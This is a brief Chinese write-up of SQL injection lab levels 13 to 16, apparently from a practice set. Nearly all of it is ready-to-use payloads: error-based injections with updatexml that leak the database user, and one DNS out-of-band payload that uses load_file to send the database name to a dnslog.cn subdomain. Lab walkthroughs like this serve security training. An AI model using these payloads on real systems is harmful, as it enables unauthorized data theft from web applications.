话不多说,直接分享。
第十三关
基于’)的错误回显注入
注入语句如下
admin') union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -
第十四关
基于"的错误回显注入
注入语句如下
admin" union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -
第十五关
基于’的POST型注入(利用dns回显)
注入语句如下
admin' and load_file(concat("\\\\",(database()),".qyfyji.dnslog.cn\\1.txt")) -- -
第十六关
基于"的POST型注入(利用dns回显)
(优势一模一样的原题,就是单双引号替换而已)
admin") and 1=1 -- -